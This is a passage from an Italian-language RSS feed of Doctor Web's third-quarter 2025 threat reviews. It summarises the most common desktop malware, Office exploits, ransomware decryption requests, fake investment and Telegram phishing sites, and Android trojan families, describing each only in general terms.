            &lt;img src="https://st.drweb.com/static/new-www/news/2025/october/review_common_q3/01_stat_q3_2025_en.1.png" alt="#drweb"&gt;
        &lt;/a&gt;
    &lt;/div&gt;

    &lt;p&gt;Minacce più diffuse di III trimestre 2025:&lt;/p&gt;
    &lt;dl class="dlList"&gt;
        &lt;dt&gt;&lt;b&gt;VBS.KeySender.7&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Script malevolo che in ciclo infinito cerca finestre con il testo &lt;span class="string"&gt;mode extensions&lt;/span&gt;, &lt;span class="string"&gt;разработчика&lt;/span&gt; e &lt;span class="string"&gt;розробника&lt;/span&gt; e invia ad esse un evento di clic sul pulsante Escape, chiudendole forzatamente.&lt;/dd&gt;
        &lt;dt&gt;&lt;b&gt;Adware.Downware.20091&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Adware utilizzato come installer intermedio di software pirata.&lt;/dd&gt;
        &lt;dt&gt;&lt;b&gt;Trojan.Siggen31.34463&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Trojan scritto nel linguaggio di programmazione Go e studiato per caricare nel sistema di destinazione vari cryptominer e software pubblicitari. Il programma malevolo è un file DLL e si trova in &lt;span class="string"&gt;%appdata%\utorrent\lib.dll&lt;/span&gt;. Per avviarsi, sfrutta la vulnerabilità di classe DLL Search Order Hijacking nel client torrent uTorrent.&lt;/dd&gt;
        &lt;dt&gt;&lt;b&gt;Adware.Ubar.20&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Un client torrent che installa software indesiderati sul dispositivo.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=JS.Siggen5.44590&amp;lng=it"&gt;&lt;b&gt;JS.Siggen5.44590&lt;/b&gt;&lt;/a&gt;&lt;/dt&gt;
        &lt;dd&gt;Codice malevolo aggiunto a una libreria JavaScript pubblica es5-ext-main. Visualizza un messaggio specifico se il pacchetto è installato su un server con un fuso orario di città russe.&lt;/dd&gt;
    &lt;/dl&gt;

    &lt;h3&gt;Statistiche sulle applicazioni malevole nel traffico email&lt;/h3&gt;

    &lt;div class="column_grid_review column_grid_review--o" style="margin-bottom: 12px;"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/october/review_common_q3/02_mail_traffic_q2_2025_en.png" class="preview"&gt;
            &lt;img src="https://st.drweb.com/static/new-www/news/2025/october/review_common_q3/02_mail_traffic_q2_2025_en.1.png" alt="#drweb"&gt;
        &lt;/a&gt;
    &lt;/div&gt;

    &lt;dl class="dlList"&gt;
        &lt;dt&gt;&lt;b&gt;W97M.DownLoader.2938&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Famiglia di trojan downloader che utilizzano vulnerabilità in documenti Microsoft Office. Sono studiati per scaricare altri programmi malevoli sul computer attaccato.&lt;/dd&gt;
        &lt;dt&gt;&lt;b&gt;Exploit.CVE-2017-11882.123&lt;/b&gt;&lt;/dt&gt;
        &lt;dt&gt;&lt;b&gt;Exploit.CVE-2018-0798.4&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Exploit per l'utilizzo di vulnerabilità nel software Microsoft Office, che consentono di eseguire codice arbitrario.&lt;/dd&gt;
        &lt;dt&gt;&lt;b&gt;JS.Phishing.745&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Script malevolo nel linguaggio JavaScript che genera una pagina web di phishing.&lt;/dd&gt;
        &lt;dt&gt;&lt;b&gt;JS.Muldrop.371&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Script malevolo nel linguaggio JavaScript che installa nel sistema un payload.&lt;/dd&gt;
    &lt;/dl&gt;

&lt;/section&gt;

&lt;section&gt;

    &lt;h3&gt;Ransomware di criptazione&lt;/h3&gt;

    &lt;p&gt;Nel III trimestre 2025 è aumentato del 3,02% rispetto al II trimestre il numero di richieste per la decriptazione di file interessati da trojan ransomware di criptazione.&lt;/p&gt;

    &lt;p&gt;Dinamica del numero di richieste di decriptazione pervenute al servizio di supporto tecnico Doctor Web:&lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o" style="margin-bottom: 12px;"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/october/review_common_q3/03_encoder_requests_q3_2025_en.png" class="preview"&gt;
            &lt;img src="https://st.drweb.com/static/new-www/news/2025/october/review_common_q3/03_encoder_requests_q3_2025_en.1.png" alt="#drweb"&gt;
        &lt;/a&gt;
    &lt;/div&gt;

    &lt;p&gt;Ransomware di criptazione più diffusi di III trimestre 2025:&lt;/p&gt;

    &lt;ul&gt;
        &lt;li&gt;&lt;b&gt;Trojan.Encoder.35534&lt;/b&gt; — 26,99% di richieste utente&lt;/li&gt;
        &lt;li&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Trojan.Encoder.35209&amp;lng=it"&gt;&lt;b&gt;Trojan.Encoder.35209&lt;/b&gt;&lt;/a&gt; — 3,07% di richieste utente&lt;/li&gt;
        &lt;li&gt;&lt;b&gt;Trojan.Encoder.35067&lt;/b&gt; — 2,76% di richieste utente&lt;/li&gt;
        &lt;li&gt;&lt;b&gt;Trojan.Encoder.41542&lt;/b&gt; — 2,15% di richieste utente&lt;/li&gt;
        &lt;li&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Trojan.Encoder.29750&amp;lng=it"&gt;&lt;b&gt;Trojan.Encoder.29750&lt;/b&gt;&lt;/a&gt; — 1,84% di richieste utente&lt;/li&gt;
    &lt;/ul&gt;
    
&lt;/section&gt;

&lt;section&gt;
    
    &lt;h3&gt;Frode online&lt;/h3&gt;

    &lt;p&gt;Nel III trimestre 2025 gli analisti internet Doctor Web continuavano a registrare la comparsa dei siti falsificati del programma di messaggistica Telegram — anche di quelli tramite cui i truffatori cercavano di ottenere l'accesso agli account degli utenti:&lt;/p&gt;

    &lt;div class="flex fxCenter" style="margin-bottom: 12px;"&gt;
        &lt;div class="margRM"&gt;
            &lt;a href="https://st.drweb.com/static/new-www/news/2025/october/review_common_q3/04_tg_fake_1.png" class="preview"&gt;
                &lt;img src="https://st.drweb.com/static/new-www/news/2025/october/review_common_q3/04_tg_fake_1.1.png" alt="#drweb" style="max-width: 350px;"&gt;
            &lt;/a&gt;
        &lt;/div&gt;
        &lt;div&gt;
            &lt;a href="https://st.drweb.com/static/new-www/news/2025/october/review_common_q3/04_tg_fake_2.png" class="preview"&gt;
                &lt;img src="https://st.drweb.com/static/new-www/news/2025/october/review_common_q3/04_tg_fake_2.1.png" alt="#drweb" style="max-width: 350px;"&gt;
            &lt;/a&gt;
        &lt;/div&gt;
    &lt;/div&gt;

    &lt;p&gt;Inoltre, di nuovo erano diffusi i siti fraudolenti a tema finanziario. Uno di essi cercava di attirare gli utenti verso una "piattaforma di investimento del futuro" Apple Trade AI, presumibilmente creata dalla corporation Apple. I cybercriminali promettevano alle potenziali vittime la possibilità di guadagnare più di $4000 al mese, e per "l'accesso" al servizio web chiedevano di registrarsi fornendo le informazioni personali.&lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o" style="margin-bottom: 12px;"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/october/review_common_q3/05_fraud_appletradeai.png" class="preview"&gt;
            &lt;img src="https://st.drweb.com/static/new-www/news/2025/october/review_common_q3/05_fraud_appletradeai.1.png" alt="#drweb"&gt;
        &lt;/a&gt;
    &lt;/div&gt;

    &lt;p&gt;Altre risorse internet invitavano a partecipare a una "nuova piattaforma di investimento da Meta" e "creare una fonte di un reddito permanente da $4000 al mese". Per ottenere l'accesso alla "piattaforma", i visitatori di tali siti dovevano partecipare a un sondaggio e registrarsi.&lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o" style="margin-bottom: 12px;"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/october/review_common_q3/06_fraud_inv_1.png" class="preview"&gt;
            &lt;img src="https://st.drweb.com/static/new-www/news/2025/october/review_common_q3/06_fraud_inv_1.1.png" alt="#drweb"&gt;
        &lt;/a&gt;
    &lt;/div&gt;

    &lt;p&gt;I nostri esperti hanno individuato anche ennesime varianti delle false piattaforme di investimento che presumibilmente consentirebbero di guadagnare tramite bot di trading su WhatsApp.&lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o" style="margin-bottom: 12px;"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/october/review_common_q3/07_fraud_whatsappbusiness.png" class="preview"&gt;
            &lt;img src="https://st.drweb.com/static/new-www/news/2025/october/review_common_q3/07_fraud_whatsappbusiness.1.png" alt="#drweb"&gt;
        &lt;/a&gt;
    &lt;/div&gt;

    &lt;p&gt;Per "l'utilizzo" dei servizi web promessi, alle potenziali vittime venivano chiesti i dati personali:&lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o" style="margin-bottom: 12px;"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/october/review_common_q3/08_fraud_whatsappbusiness.png" class="preview"&gt;
            &lt;img src="https://st.drweb.com/static/new-www/news/2025/october/review_common_q3/08_fraud_whatsappbusiness.1.png" alt="#drweb"&gt;
        &lt;/a&gt;
    &lt;/div&gt;

    &lt;p&gt;Una serie di siti fraudolenti era rivolta a un pubblico in determinati paesi. Alcuni di essi erano mirati agli utenti dai paesi CSI, a cui i malintenzionati suggerivano di "aprire un mercato di investimento privato" e ottenere l'accesso a certi investimenti esclusivi attraverso un servizio web finanziario INSIDER X. Per fare questo, i visitatori dovevano "lasciare una richiesta" indicando i dati personali.&lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o" style="margin-bottom: 12px;"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/october/review_common_q3/09_fraud_insiderx.png" class="preview"&gt;
            &lt;img src="https://st.drweb.com/static/new-www/news/2025/october/review_common_q3/09_fraud_insiderx.1.png" alt="#drweb"&gt;
        &lt;/a&gt;
    &lt;/div&gt;

    &lt;p&gt;In uno degli schemi destinati agli utenti russi, i malintenzionati suggerivano di partecipare a un sondaggio e ottenere l'accesso a una "piattaforma di investimento" presumibilmente legata a grandi compagnie petrolifere e del gas e al portale web dei servizi statali Gosuslugi:&lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o" style="margin-bottom: 12px;"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/october/review_common_q3/10_fraud_gazgosusl.png" class="preview"&gt;
            &lt;img src="https://st.drweb.com/static/new-www/news/2025/october/review_common_q3/10_fraud_gazgosusl.1.png" alt="#drweb"&gt;
        &lt;/a&gt;
    &lt;/div&gt;

    &lt;p&gt;Altri siti i truffatori spacciavano per veri servizi web di banche russe, e suggerivano di registrarsi per "guadagnare da 50.000 rubli alla settimana":&lt;/p&gt;
    
    &lt;div class="column_grid_review column_grid_review--o" style="margin-bottom: 12px;"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/october/review_common_q3/11_fraud_finance.png" class="preview"&gt;
            &lt;img src="https://st.drweb.com/static/new-www/news/2025/october/review_common_q3/11_fraud_finance.1.png" alt="#drweb"&gt;
        &lt;/a&gt;
    &lt;/div&gt;

    &lt;p&gt;Gli abitanti di una serie di altri paesi di nuovo affrontavano tali falsificazioni. Su uno dei siti, agli utenti in Kirghizistan i truffatori suggerivano di partecipare a un programma del popolo e investire nella maggiore, secondo loro, azienda del paese:&lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o" style="margin-bottom: 12px;"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/october/review_common_q3/12_fraud_gaz.png" class="preview"&gt;
            &lt;img src="https://st.drweb.com/static/new-www/news/2025/october/review_common_q3/12_fraud_gaz.1.png" alt="#drweb"&gt;
        &lt;/a&gt;
    &lt;/div&gt;

    &lt;p&gt;Un altro sito presumibilmente sarebbe legato a una delle banche di Georgia e consentirebbe di aderire alla sua "piattaforma di investimento":&lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o" style="margin-bottom: 12px;"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/october/review_common_q3/13_fraud_bankopros.png" class="preview"&gt;
            &lt;img src="https://st.drweb.com/static/new-www/news/2025/october/review_common_q3/13_fraud_bankopros.1.png" alt="#drweb"&gt;
        &lt;/a&gt;
    &lt;/div&gt;

    &lt;p&gt;I truffatori spacciavano un simile falso sito per quello appartenente a una delle banche di Kazakistan e promettevano agli utenti un reddito di 60.000 tenge al mese:&lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o" style="margin-bottom: 12px;"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/october/review_common_q3/14_fraud_bank.png" class="preview"&gt;
            &lt;img src="https://st.drweb.com/static/new-www/news/2025/october/review_common_q3/14_fraud_bank.1.png" alt="#drweb"&gt;
        &lt;/a&gt;
    &lt;/div&gt;

    &lt;p&gt;Su una delle risorse internet, i malintenzionati, presumibilmente a nome di una compagnia petrolifera e del gas turca, invitavano le potenziali vittime a diventare partecipanti a una piattaforma di investimento e guadagnare "fino a 9000 lire turche al giorno":&lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o" style="margin-bottom: 12px;"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/october/review_common_q3/15_fraud_bankoffer.png" class="preview"&gt;
            &lt;img src="https://st.drweb.com/static/new-www/news/2025/october/review_common_q3/15_fraud_bankoffer.1.png" alt="#drweb"&gt;
        &lt;/a&gt;
    &lt;/div&gt;

    &lt;p&gt;Allo stesso tempo, i truffatori hanno continuato a sfruttare l'argomento dei vari bonus e compensazioni statali. Su uno dei siti indesiderati rivolti agli utenti di Kazakistan, i visitatori presumibilmente potrebbero controllare la disponibilità di una compensazione pecuniaria e ricevere fino a 5.000.000 tenge:&lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o" style="margin-bottom: 32px;"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/october/review_common_q3/16_fraud_compensation.png" class="preview"&gt;
            &lt;img src="https://st.drweb.com/static/new-www/news/2025/october/review_common_q3/16_fraud_compensation.1.png" alt="#drweb"&gt;
        &lt;/a&gt;
    &lt;/div&gt;

    &lt;a href="http://antifraud.drweb.com/dangerous_urls/" target="_blank"&gt;Scopri di più sui siti sconsigliati da Dr.Web&lt;/a&gt;

&lt;/section&gt;

&lt;section&gt;

    &lt;h3&gt;Software malevoli e indesiderati per dispositivi mobili&lt;/h3&gt;

    &lt;p&gt;Secondo le statistiche di rilevamento di Dr.Web Security Space per dispositivi mobili, nel III trimestre 2025 gli utenti il più frequentemente si imbattevano nei trojan pubblicitari &lt;a href="https://vms.drweb-av.it/search/?q=Android.MobiDash&amp;lng=it"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt;. I trojan che erano i leader in precedenza &lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; sono scesi alla seconda posizione, diminuendo sostanzialmente l'attività. I terzi più diffusi sono stati i programmi malevoli falsificazione &lt;a href="https://vms.drweb-av.it/search/?q=Android.FakeApp&amp;lng=it"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;.&lt;/p&gt;

    &lt;p&gt;Rispetto al II trimestre il numero di rilevamenti dei trojan bancari &lt;a href="https://vms.drweb-av.it/search/?q=Android.BankBot&amp;lng=it"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt; è aumentato, mentre quello dei trojan &lt;a href="https://vms.drweb-av.it/search/?q=Android.Banker&amp;lng=it"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt; e &lt;b&gt;Android.SpyMax&lt;/b&gt; è diminuito.&lt;/p&gt;

    &lt;p&gt;Ad agosto gli esperti dell'azienda Doctor Web &lt;a href="https://news.drweb.com/show/?i=15047&amp;lng=en" target="_blank"&gt;hanno parlato&lt;/a&gt; di un backdoor multifunzionale &lt;a href="https://vms.drweb-av.it/search/?q=Android.Backdoor.916.origin&amp;lng=it"&gt;&lt;b&gt;Android.Backdoor.916.origin&lt;/b&gt;&lt;/a&gt;, che i malintenzionati utilizzavano per rubare dati riservati e spiare rappresentanti di imprese russe.&lt;/p&gt;

    &lt;p&gt;Negli ultimi 3 mesi sullo store di app Google Play sono stati rilevati oltre 70 programmi malevoli e indesiderati. In particolare, i trojan &lt;a href="https://vms.drweb-av.it/search/?q=Android.Joker&amp;lng=it"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt;, che iscrivono utenti a servizi a pagamento, i programmi falsificazione &lt;a href="https://vms.drweb-av.it/search/?q=Android.FakeApp&amp;lng=it"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; e i software &lt;a href="https://vms.drweb-av.it/search/?q=Program.FakeMoney&amp;lng=it"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.16&lt;/b&gt;, che presumibilmente consentirebbero di convertire premi virtuali in denaro reale.&lt;/p&gt;

    &lt;p&gt;Eventi più importanti relativi alla sicurezza "mobile" in III trimestre:&lt;/p&gt;

    &lt;ul&gt;
        &lt;li&gt;Crescita dell'attività dei trojan pubblicitari &lt;a href="https://vms.drweb-av.it/search/?q=Android.MobiDash&amp;lng=it"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt;&lt;/li&gt;
        &lt;li&gt;Calo dell'attività dei trojan pubblicitari &lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;/li&gt;
        &lt;li&gt;Maggiore attività dei trojan bancari &lt;a href="https://vms.drweb-av.it/search/?q=Android.BankBot&amp;lng=it"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt;&lt;/li&gt;
        &lt;li&gt;Diminuito il numero di attacchi dei trojan bancari &lt;a href="https://vms.drweb-av.it/search/?q=Android.Banker&amp;lng=it"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt; e &lt;b&gt;Android.SpyMax&lt;/b&gt;&lt;/li&gt;
        &lt;li&gt;Backdoor &lt;a href="https://vms.drweb-av.it/search/?q=Android.Backdoor.916.origin&amp;lng=it"&gt;&lt;b&gt;Android.Backdoor.916.origin&lt;/b&gt;&lt;/a&gt; utilizzato dai malintenzionati per spiare rappresentanti di imprese russe&lt;/li&gt;
        &lt;li&gt;Distribuzione di numerose minacce sullo store di app Google Play&lt;/li&gt;
    &lt;/ul&gt;

    &lt;p&gt;Per maggiori informazioni sulla situazione di virus per dispositivi mobili nel III trimestre 2025 leggete la nostra &lt;a href="https://news.drweb-av.it/show/?i=15060" target="_blank"&gt;panoramica&lt;/a&gt;.&lt;/p&gt;

&lt;/section&gt;</description></item><item><guid>https://news.drweb-av.it/show/?i=15060&amp;lng=it</guid><title>Doctor Web: panoramica sull'attività di virus per dispositivi mobili in III trimestre 2025</title><link>https://news.drweb-av.it/show/?i=15060&amp;lng=it&amp;c=9</link><pubDate>Wed, 01 Oct 2025 13:00:38 GMT</pubDate><description>&lt;p&gt;&lt;b&gt;1 ottobre 2025&lt;/b&gt;&lt;/p&gt;

&lt;section&gt;

    &lt;p&gt;&lt;strong&gt;&lt;newslead&gt;Secondo le statistiche di rilevamento di Dr.Web Security Space per dispositivi mobili, nel III trimestre 2025 sono stati i più diffusi i trojan pubblicitari &lt;a href="https://vms.drweb-av.it/search/?q=Android.MobiDash&amp;lng=it"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt;, che mostrano annunci invadenti. Rispetto al periodo di osservazione precedente, venivano rilevati sui dispositivi protetti il 18,19% più spesso.&lt;/newslead&gt;&lt;/strong&gt;&lt;/p&gt;

    &lt;p&gt;Sono scesi alla seconda posizione i trojan pubblicitari &lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;, la cui attività è in calo per il secondo trimestre consecutivo. Durante gli ultimi tre mesi gli utenti dovevano affrontarli il 71,85% meno spesso. Queste applicazioni malevole nascondono le proprie icone in modo che sia più difficile rilevarle e rimuoverle, e visualizzano annunci pubblicitari, tra cui filmati a schermo intero.&lt;/p&gt;

    &lt;p&gt;Alla terza posizione di nuovo si trovano i programmi malevoli falsificazione &lt;a href="https://vms.drweb-av.it/search/?q=Android.FakeApp&amp;lng=it"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;, che vengono utilizzati dai malintenzionati in vari schemi fraudolenti. Il numero di rilevamenti è diminuito del 7,49%. Invece di fornire le funzionalità dichiarate, tali trojan spesso caricano vari siti — ad esempio siti fraudolenti e malevoli, nonché siti di casinò online e di scommesse.&lt;/p&gt;

    &lt;p&gt;I trojan bancari più diffusi restano i campioni della famiglia &lt;a href="https://vms.drweb-av.it/search/?q=Android.Banker&amp;lng=it"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;, nonostante una diminuzione dell'attività del 38,88%. I malintenzionati li utilizzano per ottenere un accesso illegale a conti bancari e rubare denaro. Questi trojan possono visualizzare finestre di phishing per rubare login e password, imitare l'aspetto esteriore dei veri programmi di online banking, intercettare messaggi SMS per ottenere codici monouso ecc.&lt;/p&gt;

    &lt;p&gt;Sono seguiti dai trojan &lt;a href="https://vms.drweb-av.it/search/?q=Android.BankBot&amp;lng=it"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt;, che venivano rilevati il 18,91% più spesso. Essi anche cercano di ottenere l'accesso ad account di online banking di utenti intercettando i codici di conferma. Inoltre, questi trojan bancari possono eseguire vari comandi dei cybercriminali, e alcuni di essi consentono di gestire in remoto i dispositivi infetti.&lt;/p&gt;

    &lt;p&gt;Chiudono la top tre dei leader i campioni della famiglia &lt;b&gt;Android.SpyMax&lt;/b&gt;, che sono basati sul codice sorgente del trojan spia SpyNote. I rilevamenti sono stati il 17,25% meno frequenti rispetto al II trimestre. Questi malware possiedono una vasta gamma di funzionalità malevole, tra l'altro, consentono di gestire in remoto i dispositivi.&lt;/p&gt;

    &lt;p&gt;Ad agosto &lt;a href="https://news.drweb.com/show/?i=15047&amp;lng=en" target="_blank"&gt;abbiamo riferito&lt;/a&gt; una campagna di distribuzione di un backdoor multifunzionale &lt;a href="https://vms.drweb-av.it/search/?q=Android.Backdoor.916.origin&amp;lng=it"&gt;&lt;b&gt;Android.Backdoor.916.origin&lt;/b&gt;&lt;/a&gt;, che i criminali informatici utilizzano per rubare dati riservati e spiare utenti di dispositivi Android. I malintenzionati inviavano alle potenziali vittime un messaggio in vari sistemi di messaggistica istantanea suggerendo l'installazione di un "antivirus" dal file APK allegato. Il laboratorio antivirus Doctor Web ha individuato le prime versioni di questo programma malevolo ancora a gennaio 2025, e da quel momento continua a monitorarne l'evoluzione. Secondo le valutazioni dei nostri esperti, il backdoor viene impiegato negli attacchi mirati e non è destinato alla distribuzione di massa. L'obiettivo principale dei cybercriminali sono rappresentanti di imprese russe.&lt;/p&gt;

    &lt;p&gt;Durante il III trimestre sullo store di app Google Play venivano distribuite numerose applicazioni malevole e indesiderate, che in totale contano oltre 1.459.000 installazioni. Tra queste, decine dei trojan &lt;a href="https://vms.drweb-av.it/search/?q=Android.Joker&amp;lng=it"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt;, che abbonano vittime a servizi a pagamento, nonché le applicazioni falsificazio &lt;a href="https://vms.drweb-av.it/search/?q=Android.FakeApp&amp;lng=it"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;. Inoltre, i nostri analisti dei virus hanno individuato un ennesimo programma che presumibilmente consentirebbe di convertire premi virtuali in denaro reale.&lt;/p&gt;

    &lt;div class="colorful"&gt;
        &lt;h3&gt;Principali tendenze di II trimestre&lt;/h3&gt;
        &lt;ul&gt;
            &lt;li&gt;Trojan pubblicitari &lt;a href="https://vms.drweb-av.it/search/?q=Android.MobiDash&amp;lng=it"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt; sono le minacce più diffuse&lt;/li&gt;
            &lt;li&gt;Continua il calo dell'attività dei trojan pubblicitari &lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;/li&gt;
            &lt;li&gt;Aumentato il numero di attacchi dei trojan bancari della famiglia &lt;a href="https://vms.drweb-av.it/search/?q=Android.BankBot&amp;lng=it"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt;&lt;/li&gt;
            &lt;li&gt;Diminuita l'attività dei trojan bancari &lt;a href="https://vms.drweb-av.it/search/?q=Android.Banker&amp;lng=it"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt; e &lt;b&gt;Android.SpyMax&lt;/b&gt;&lt;/li&gt;
            &lt;li&gt;Cybercriminali utilizzano il backdoor multifunzionale &lt;a href="https://vms.drweb-av.it/search/?q=Android.Backdoor.916.origin&amp;lng=it"&gt;&lt;b&gt;Android.Backdoor.916.origin&lt;/b&gt;&lt;/a&gt; per attacchi a rappresentanti di imprese russe&lt;/li&gt;
            &lt;li&gt;Sullo store di app Google Play venivano distribuiti numerosi programmi malevoli&lt;/li&gt;
        &lt;/ul&gt;
    &lt;/div&gt;

&lt;/section&gt;

&lt;section&gt;

    &lt;h3&gt;Secondo i dati di Dr.Web Security Space per dispositivi mobili&lt;/h3&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/october/review_mobile_q3/01_malware_q3_2025_en.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/october/review_mobile_q3/01_malware_q3_2025_en.1.png" alt="Malware_Stat_Q3_2025"&gt;
        &lt;/a&gt;
    &lt;/div&gt;

    &lt;dl class="dlList"&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Android.MobiDash&amp;lng=it"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.7859&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Programma trojan che visualizza annunci pubblicitari invadenti. È un modulo software che gli sviluppatori software incorporano nelle applicazioni.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Android.FakeApp&amp;lng=it"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1600&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Programma trojan che carica il sito web specificato nelle sue impostazioni. Le varianti conosciute di questa applicazione malevola caricano un sito di casinò online.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Android.Click&amp;lng=it"&gt;&lt;b&gt;Android.Click&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1812&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Rilevamento di mod malevole dell'applicazione di messaggistica WhatsApp, che impercettibilmente per l'utente possono caricare vari siti in modalità background.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.673.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Programma trojan per la visualizzazione di pubblicità invadenti. I campioni della famiglia &lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; spesso vengono distribuiti sotto le apparenze di applicazioni innocue e in alcuni casi vengono installati nella directory di sistema da altri software malevoli. Entrando su dispositivi Android, tali trojan pubblicitari di solito nascondono all'utente la propria presenza sul sistema: per esempio, nascondono l'icona dell'applicazione dal menu della schermata principale.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Android.Triada&amp;lng=it"&gt;&lt;b&gt;Android.Triada&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.5847&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Rilevamento di un packer per i trojan della famiglia &lt;a href="https://vms.drweb-av.it/search/?q=Android.Triada&amp;lng=it"&gt;&lt;b&gt;Android.Triada&lt;/b&gt;&lt;/a&gt;, studiato per proteggerli dall'analisi e dal rilevamento. Il più delle volte i malintenzionati lo utilizzano insieme a mod malevole dell'applicazione di messaggistica Telegram, in cui questi trojan sono direttamente integrati.&lt;/dd&gt;
    &lt;/dl&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/october/review_mobile_q3/02_unwanted_q3_2025_en.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/october/review_mobile_q3/02_unwanted_q3_2025_en.1.png" alt="Unwanted_Stat_Q3_2025"&gt;
        &lt;/a&gt;
    &lt;/div&gt;

    &lt;dl class="dlList"&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Program.FakeMoney&amp;lng=it"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.11&lt;/b&gt;&lt;/dt&gt;
